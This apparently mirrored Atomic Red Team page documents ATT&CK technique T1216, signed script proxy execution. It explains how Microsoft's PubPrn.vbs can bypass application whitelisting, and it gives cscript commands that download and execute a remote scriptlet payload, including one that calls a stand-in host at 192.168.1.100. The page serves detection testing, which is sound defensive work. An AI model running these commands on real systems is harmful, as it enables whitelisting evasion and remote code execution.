security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
1663bf7d524b6fc8a9a39104feb2949b36368dfc
atomic-red-team/atomics/T1216/T1216.md
T
CircleCI Atomic Red Team doc generator 499c751bcc Generate docs from job=validate_atomics_generate_docs branch=master
2019-09-03 13:36:10 +00:00

1.5 KiB
Raw Blame History

T1216 - Signed Script Proxy Execution

Description from ATT&CK

Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.

PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site. (Citation: Enigma0x3 PubPrn Bypass) Example command: cscript C[:]\Windows\System32\Printing_Admin_Scripts\en-US\pubprn[.]vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png

There are several other signed scripts that may be used in a similar manner. (Citation: GitHub Ultimate AppLocker Bypass List)

Atomic Tests


Atomic Test #1 - PubPrn.vbs Signed Script Bypass

Executes the signed PubPrn.vbs script with options to download and execute an arbitrary payload.

Supported Platforms: Windows

Inputs

Name Description Type Default Value
remote_payload A remote payload to execute using PubPrn.vbs. Url https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct

Run it with command_prompt!

cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:#{remote_payload}"

Reference in New Issue View Git Blame Copy Permalink